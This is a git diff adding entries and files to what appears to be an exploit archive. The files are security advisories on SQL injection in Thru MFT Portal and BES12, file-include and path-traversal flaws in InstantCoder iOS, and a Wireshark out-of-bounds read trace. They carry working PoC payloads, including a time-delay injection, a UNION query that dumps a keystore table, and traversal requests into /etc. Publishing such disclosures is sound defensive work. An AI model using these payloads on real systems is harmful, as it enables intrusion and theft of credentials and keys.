diff --git a/files.csv b/files.csv
index 1674a21f4..49020e8fd 100755
--- a/files.csv
+++ b/files.csv
@@ -33631,6 +33631,7 @@ id,file,description,date,author,platform,type,port
37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80
37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
+39479,platforms/ios/webapps/39479.txt,"InstantCoder 1.0 iOS - Multiple Vulnerabilities",2016-02-22,Vulnerability-Lab,ios,webapps,0
37298,platforms/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",hardware,webapps,80
37299,platforms/windows/dos/37299.py,"XtMediaPlayer 0.93 (.wav) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0
37300,platforms/windows/dos/37300.py,"FinePlayer 2.20 (.mp4) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0
@@ -35716,3 +35717,9 @@ id,file,description,date,author,platform,type,port
39476,platforms/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",multiple,dos,0
39477,platforms/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",windows,webapps,8500
39478,platforms/php/webapps/39478.txt,"SOLIDserver <=5.0.4 - Local File Inclusion Vulnerability",2016-02-20,"Saeed reza Zamanian",php,webapps,0
+39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow PoC",2016-02-22,INSECT.B,windows,local,0
+39481,platforms/java/webapps/39481.txt,"BlackBerry Enterprise Service < 12.4 (BES12) Self-Service - Multiple Vulnerabilities",2016-02-22,Security-Assessment.com,java,webapps,0
+39482,platforms/multiple/dos/39482.txt,"Wireshark - dissect_oml_attrs Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
+39483,platforms/multiple/dos/39483.txt,"Wireshark - add_ff_vht_compressed_beamforming_report Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
+39484,platforms/multiple/dos/39484.txt,"Wireshark - dissect_ber_set Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
+39485,platforms/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",asp,webapps,80
diff --git a/platforms/asp/webapps/39485.txt b/platforms/asp/webapps/39485.txt
new file mode 100755
index 000000000..b4e51d06d
--- /dev/null
+++ b/platforms/asp/webapps/39485.txt
@@ -0,0 +1,126 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA512
+
+Advisory ID: SYSS-2015-056
+Product: Thru Managed File Transfer Portal
+Manufacturer: Thru
+Affected Version(s): 9.0.2
+Tested Version(s): 9.0.2
+Vulnerability Type: SQL Injection (CWE-89)
+Risk Level: High
+Solution Status: Open
+Manufacturer Notification: 2015-10-28
+Solution Date: 2016-01-22
+Public Disclosure: 2016-02-15
+CVE Reference: Not yet assigned
+Authors of Advisory: Dr. Erlijn van Genuchten, Danny Österreicher
+ (SySS GmbH)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Overview:
+
+Thru Managed File Transfer Portal is a web based file transfer application.
+According to the Thru website [1], the application aims to offload large
+file transfer to a single platform, to protect files, to replace FTP
+servers and to allow access to files anytime, anywhere.
+
+An SQL injection vulnerability was identified in one of the GET request.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Vulnerability Details:
+
+The SQL injection vulnerability was found in a GET request that causes
+contact data to be sorted. At least the attribute values of sortorder
+and letterrange are not correctly sanitized and therefore can be abused
+to inject arbitrary SQL statements.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Proof of Concept (PoC):
+
+The following HTTP request can be used to show that the SQL statement
+causing a delay is executed and results in a 500 server error:
+
+GET /App/asp///contacts.asp?sortorder=1;WAITFOR+DELAY+'0:0:5'--&letterrange=all&fromrec=0&torec=20 HTTP/1.1
+Host: [HOST]
+Cookie: [COOKIES]
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Solution:
+
+The reported security vulnerability has been fixed in a new software
+release. Update to the new software version.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Disclosure Timeline:
+
+2015-10-27: Vulnerability discovered
+2015-10-28: Vulnerability reported to manufacturer
+2016-01-22: Manufacturer announced update
+2016-02-15: Public release of security advisory
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+References:
+
+[1] Thru Homepage
+ http://www.thruinc.com
+[2] SySS Security Advisory SYSS-2015-056
+ https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-056.txt
+[3] SySS Responsible Disclosure Policy
+ https://www.syss.de/en/news/responsible-disclosure-policy/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Credits:
+
+This security vulnerability was found by Dr. Erlijn van Genuchten and
+Danny Österreicher of the SySS GmbH.
+
+E-Mail: erlijn.vangenuchten@syss.de
+Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
+Key ID: 0xBD96FF2A
+Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A
+
+E-Mail: danny.oesterreicher@syss.de
+Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Danny_Oesterreicher.asc
+Key ID: 0x96029AC7
+Key Fingerprint: 0B53 8B52 9B5F 39C9 68F5 18C9 9284 FCEB 9602 9AC7
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Disclaimer:
+
+The information provided in this security advisory is provided "as is"
+and without warranty of any kind. Details of this security advisory may
+be updated in order to provide as accurate information as possible. The
+latest version of this security advisory is available on the SySS Web
+site.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Copyright:
+
+Creative Commons - Attribution (by) - Version 3.0
+URL: http://creativecommons.org/licenses/by/3.0/deed.en
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1
+
+iQIcBAEBCgAGBQJWwbbpAAoJEAylhje9lv8qAh4P/1yg6xg5xHvvnh2Al1fy/ley
+rABwBv9YmcNhNLASrxPOXGBx6rcuCc5zEdOI62PKv4E19VMcjOvwHw5MzfP/4GDu
+LAAku71zIn6YCxYF1NKScyqDeBg6OZfHiW6EP/ufhFD+pzu0FySmj2G3/lflloEX
+FBNHzNURGakWizxzaNbnnltI3DuxPss3E67crJMHEPtXUw0dVrQAeMtsyc46708z
+pWh1JAvNNIlqyyQwyy3EOvQtOIkYd8SMmayla2CUpl0xC5On5GcxkqvaZcqyScR9
+s4rxVS8x7akGDGS/F2aFM2zEfCL5DAXVCoRWTyKYqcMYINdZY3xuREcG3iOXVMrp
+yRYBg6dgwf3QHRmCrkZLlKx6hibHG13dRykD7LPcO3H+q81Ll4T/6OuHqbHbPjD2
+EeOqW+bKDn//TKrsUbwvaM/1hF96T66QLRvUeTGHbMoNjN3fQTTqdBaYHq8ROiD8
+Xc1ybVxgxUMKi+3WEvOw5aYF6Q/RN9Z4WN2p88+MLrBRFCh6nHT0jPKZFyxZuooi
+b3MI/qPawWO4HfpjvunCdNGo49I34JCcAsi2Um8qzM/aedbUaH1dqj6sZW4j8bA2
+WzwXgwnLXQ+wON/tCDz8Q4NfZWbDG2v1anJBOTIgABjLAeuo0nDaBYonyp4lY/Og
+4UaL7kboaGGj3mRINLd8
+=df2e
+-----END PGP SIGNATURE-----
\ No newline at end of file
diff --git a/platforms/ios/webapps/39479.txt b/platforms/ios/webapps/39479.txt
new file mode 100755
index 000000000..228f3296d
--- /dev/null
+++ b/platforms/ios/webapps/39479.txt
@@ -0,0 +1,298 @@
+Document Title:
+===============
+InstantCoder v1.0 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1738
+
+
+Release Date:
+=============
+2016-02-22
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1738
+
+
+Common Vulnerability Scoring System:
+====================================
+7
+
+
+Product & Service Introduction:
+===============================
+You are one of the best developers in the world and you would like to code anytime, anywhere. CuteCoder makes it possible
+for your to code and debug web apps on your lovely iPhone and iPad.
+
+(Copy of the Homepage: https://itunes.apple.com/ai/app/instantcoder/id1067517686 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Core Research Team discovered multiple vulnerabilities in the official InstantCoder mobile iOS web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2016-02-22: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Shumin Sun
+Product: InstantCoder - iOS (Web-Application) 1.0
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+1.1
+A local file include web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
+The file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
+commands to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `./toolkit/upload` module. Remote attackers are able to inject own
+files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local
+file/path include execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to
+inject the lfi payload by usage of the wifi interface or local file sync function.
+
+Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious
+attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
+
+The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
+Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
+Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
+
+Request Method(s):
+ [+] [POST]
+
+Vulnerable Module(s):
+ [+] ./toolkit/upload
+
+Vulnerable Parameter(s):
+ [+] filename
+
+Affected Module(s):
+ [+] Index File Dir Listing (http://localhost:8080/)
+
+
+
+1.2
+A directory traversal web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
+The vulnerability allows remote attackers to unauthorized access path variables to compromise the web-application or mobile device.
+
+The directory traversal web vulnerability is located in the `path` value of the `listFiles` module. Remote attackers are able to
+manipulate the path variable GET or POST method request to compromise the application. The request method to inject the payload is
+POST and the request method to execute is GET. The attack vector of the vulnerability is located on the application-side. The path
+variable is not encoded or parsed. Thus allows an attacker to inject to unauthorized access the local system or app path.
+
+The security risk of the path traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.0.
+Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application (wifi ui) user account.
+Successful exploitation of the path traversal vulnerability results in mobile application compromise or compromise of connected device components.
+
+
+Request Method(s):
+ [+] [POST]
+
+Vulnerable Module(s):
+ [+] ./listFiles
+
+Vulnerable Parameter(s):
+ [+] path
+
+Affected Module(s):
+ [+] Index File Dir Listing (http://localhost:8080/)
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The local file include web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+PoC: Payload
+http://localhost:8080/toolkit/index.html./[LOCAL FILE INCLUDE VULNERABILITY!]
+
+
+PoC: Vulnerable Source
+javascript:changePath("./[LOCAL FILE INCLUDE VULNERABILITY!]");
+
+
+--- PoC Session Logs [POST] ---
+Status: 200[OK]
+POST http://localhost:8080/toolkit/upload?path= Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8080]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
+ Accept[*/*]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ X-Requested-With[XMLHttpRequest]
+ Referer[http://localhost:8080/toolkit/index.html]
+ Content-Length[819]
+ Content-Type[multipart/form-data; boundary=---------------------------29343138867419]
+ Connection[keep-alive]
+ POST-Daten:
+ POST_DATA[-----------------------------29343138867419
+Content-Disposition: form-data; name="path"
+-----------------------------29343138867419
+Content-Disposition: form-data; name="upload1"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]"
+Content-Type: image/png
+-
+Status: 200[OK]
+GET http://localhost:8080/toolkit/index.html Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[4995] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8080]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
+ Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Connection[keep-alive]
+ Cache-Control[max-age=0]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[4995]
+ Date[Mon, 22 Feb 2016 08:33:04 GMT]
+
+
+Reference(s):
+http://localhost:8080/toolkit/upload
+http://localhost:8080/toolkit/index.html
+
+
+
+1.2
+Thedirectory traversal web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+PoC: Payload
+http://localhost:8080/listFiles?path=./.././../../../../../../../../../../
+
+
+PoC: Vulnerable Source
+
+
+
+
+
+Status: 200[OK]
+POST http://localhost:8080/listFiles?path=/ Load Flags[LOAD_BACKGROUND VALIDATE_ALWAYS LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8080]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
+ Accept[*/*]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ X-Requested-With[XMLHttpRequest]
+ Referer[http://localhost:8080/toolkit/index.html]
+ Connection[keep-alive]
+ Content-Length[0]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[162]
+ Date[Mon, 22 Feb 2016 08:09:34 GMT]
+-
+Status: 200[OK]
+POST http://localhost:8080/listFiles?path=/.././../../../../../../../../../../etc/%00 Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8080]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
+ Accept[*/*]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ X-Requested-With[XMLHttpRequest]
+ Referer[http://localhost:8080/toolkit/index.html]
+ Connection[keep-alive]
+ Content-Length[0]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[2]
+ Date[Mon, 22 Feb 2016 08:09:37 GMT]
+-
+Status: 200[OK]
+POST http://localhost:8080/listFiles?path=./.././../../../../../../../../../../ Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8080]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
+ Accept[*/*]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ X-Requested-With[XMLHttpRequest]
+ Referer[http://localhost:8080/toolkit/index.html]
+ Connection[keep-alive]
+ Content-Length[0]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[2]
+ Date[Mon, 22 Feb 2016 08:09:45 GMT]
+
+
+Reference(s):
+http://localhost:8080/listFiles
+
+
+Security Risk:
+==============
+1.1
+The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.7)
+
+1.2
+The security risk of the directory traversal web vulnerability in the list path GET method request is estimated as high. (CVSS 7.0)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+ Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/java/webapps/39481.txt b/platforms/java/webapps/39481.txt
new file mode 100755
index 000000000..49d1beb19
--- /dev/null
+++ b/platforms/java/webapps/39481.txt
@@ -0,0 +1,149 @@
+( , ) (,
+ . '.' ) ('. ',
+ ). , ('. ( ) (
+ (_,) .'), ) _ _,
+ / _____/ / _ \ ____ ____ _____
+ \____ \==/ /_\ \ _/ ___\/ _ \ / \
+ / \/ | \\ \__( <_> ) Y Y \
+/______ /\___|__ / \___ >____/|__|_| /
+ \/ \/.-. \/ \/:wq
+ (x.0)
+ '=.|w|.='
+ _=''"''=.
+
+ presents..
+
+BlackBerry Enterprise Service 12 (BES12) Self-Service
+Affected versions: BES12 < 12.4
+
+CVE: CVE-2016-1914 and CVE-2016-1915
+
+PDF:
+http://security-assessment.com/files/documents/advisory/Blackberry%20BES12%20Self-Service%20Multiple%20Vulnerabilities.pdf
+
+
++-----------+
+|Description|
++-----------+
+
+Blackberry BES12 is an enterprise mobile management solution and
+contains a self-service web application available to mobile users. This
+web application contains multiple vulnerabilities including
+unauthenticated SQL
+injection and reflected cross site scripting.
+
+Limited access to an on-premise BES12 environment was provided during
+the discovery of these vulnerabilities. The full impact of the
+vulnerabilities in relation to compromising other portions of the BES12
+solution, such as mobile devices, is unclear.
+
+
++------------+
+|Exploitation|
++------------+
+
+*SQL Injection*
+
+The Java servlet com.rim.mdm.ui.server.ImageServlet is vulnerable to SQL
+injection via the imageName parameter. This servlet is exposed at
+multiple paths and is used to fetch an image from the database:
+
+/mydevice/client/image
+/admin/client/image
+/myapps/client/image
+/ssam/client/image
+/all/client/image
+
+
+This was discovered on a production BES12 on-premise deployment and the
+injection vector allowed both UNION and stacked queries to be executed
+on the Microsoft SQL server used by BES12. This allows full read/write
+access to the database, and can potentially result in command execution
+via xp_cmdshell depending on the database user configuration.
+
+The following proof of concept demonstrates an injection payload which
+will select the entire obj_keystore_entry table. The query will
+serialise the entire table into an XML document which is returned in the
+HTTP response as UTF-16 without the leading BOM (byte order mark)
+causing most text editors to fail to display the response correctly.
+
+https:///mydevice/client/image?imageName=ui.cobranded.login.logo'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,(SELECT+*+FROM+obj_keystore_entry+FOR+XML+PATH(''))+--
+
+The technique above can be used to download any database table available
+to the BES12 database user.
+
+Notable database tables are:
+* obj_user which contains BES12 user details.
+* obj_user_authentication which contains authentication tokens.
+* obj_user_device which based on column names, contains enrolment
+tokens, enrolment secrets and device encryption keys.
+
+It is unclear if this information is sufficient to decrypt a lost/stolen
+BES12 mobile device.
+
+
+*Reflected Cross Site Scripting*
+
+Two areas of the self-service web application exist where user-supplied
+input is reflected directly in web pages, allowing a malicious user to
+conduct Cross Site Scripting (XSS) attacks against users of the
+application. While the application uses the HttpOnly cookie flag for
+session tokens, successful exploitation allows malicious JavaScript to
+perform any action within the application that the targeted user is able
+to. The administrative web application is typically hosted on the same
+domain and may be attacked using these XSS vectors, although this is
+BES12 deployment specific.
+
+The table below details where Cross Site Scripting was detected and
+which parameters are vulnerable:
+
+https:///mydevice/index.jsp?locale=">
+https:///mydevice/loggedOut.jsp?locale=">
+
+
++----------+
+| Solution |
++----------+
+
+
+Upgrade to BES12.4.
+
+
++-------------------+
+|Disclosure Timeline|
++-------------------+
+
+
+Initial disclosure to Blackberry – 19 Nov 2015
+Disclosure receipt confirmed by Blackberry – 19 Nov 2015
+Request for update from Blackberry – 7 Dec 2015
+Vulnerabilities confirmed by Blackberry – 8 Dec 2015
+Blackberry confirms fixes will be released as part of BES12.4 – 28 Jan 2016
+BES12.4 released – 29 Jan 2016
+Advisory released – 15 Feb 2016
+
+
++-----------------------------+
+|About Security-Assessment.com|
++-----------------------------+
+
+
+Security-Assessment.com is a leading team of Information Security
+consultants specialising in providing high quality Information Security
+services to clients throughout the Asia Pacific region. Our clients
+include some of the largest globally recognised companies in areas such
+as finance, telecommunications, broadcasting, legal and government. Our
+aim is to provide the very best independent advice and a high level of
+technical expertise while creating long and lasting professional
+relationships with our clients.
+Security-Assessment.com is committed to security research and
+development, and its team continues to identify and responsibly publish
+vulnerabilities in public and private software vendor's products.
+Members of the Security-Assessment.com R&D team are globally recognised
+through their release of whitepapers and presentations related to new
+security research.
+
+For further information on this issue or any of our service offerings,
+contact us:
+Web www.security-assessment.com
+Email info@security-assessment.com
diff --git a/platforms/multiple/dos/39482.txt b/platforms/multiple/dos/39482.txt
new file mode 100755
index 000000000..070f433de
--- /dev/null
+++ b/platforms/multiple/dos/39482.txt
@@ -0,0 +1,98 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=656
+
+The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==5092==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f72db15e078 at pc 0x7f72cffb364f bp 0x7ffe98a8b690 sp 0x7ffe98a8b688
+READ of size 4 at 0x7f72db15e078 thread T0
+ #0 0x7f72cffb364e in dissect_oml_attrs wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17
+ #1 0x7f72cffb3286 in dissect_oml_fom wireshark/epan/dissectors/packet-gsm_abis_oml.c:1799:11
+ #2 0x7f72cffb2cbe in dissect_abis_oml wireshark/epan/dissectors/packet-gsm_abis_oml.c:1861:13
+ #3 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #4 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #5 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
+ #6 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #7 0x7f72cf11e344 in call_dissector wireshark/epan/packet.c:2692:9
+ #8 0x7f72cffc53b7 in dissect_ipa wireshark/epan/dissectors/packet-gsm_ipa.c:333:5
+ #9 0x7f72cffc4dab in dissect_ipa_tcp wireshark/epan/dissectors/packet-gsm_ipa.c:376:2
+ #10 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #11 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #12 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #13 0x7f72d10c59dd in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4615:9
+ #14 0x7f72d10cb043 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
+ #15 0x7f72d10c639c in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
+ #16 0x7f72d10db7a3 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
+ #17 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #18 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #19 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #20 0x7f72d022188b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
+ #21 0x7f72d022c2b9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
+ #22 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #23 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #24 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #25 0x7f72cf114964 in dissector_try_uint wireshark/epan/packet.c:1174:9
+ #26 0x7f72cfd3348d in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
+ #27 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #28 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #29 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
+ #30 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #31 0x7f72cfd2f725 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
+ #32 0x7f72cfd27f33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
+ #33 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #34 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #35 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #36 0x7f72cfe235f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
+ #37 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #38 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #39 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
+ #40 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #41 0x7f72cf10f33b in dissect_record wireshark/epan/packet.c:501:3
+ #42 0x7f72cf0bd3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
+ #43 0x5264eb in process_packet wireshark/tshark.c:3728:5
+ #44 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
+ #45 0x515daf in main wireshark/tshark.c:2197:13
+
+0x7f72db15e078 is located 0 bytes to the right of global variable 'nm_att_tlvdef_base' defined in 'packet-gsm_abis_oml.c:1356:30' (0x7f72db15d880) of size 2040
+SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17 in dissect_oml_attrs
+Shadow bytes around the buggy address:
+ 0x0feedb623bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0feedb623bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0feedb623bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0feedb623be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0feedb623bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0feedb623c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f9]
+ 0x0feedb623c10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
+ 0x0feedb623c20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
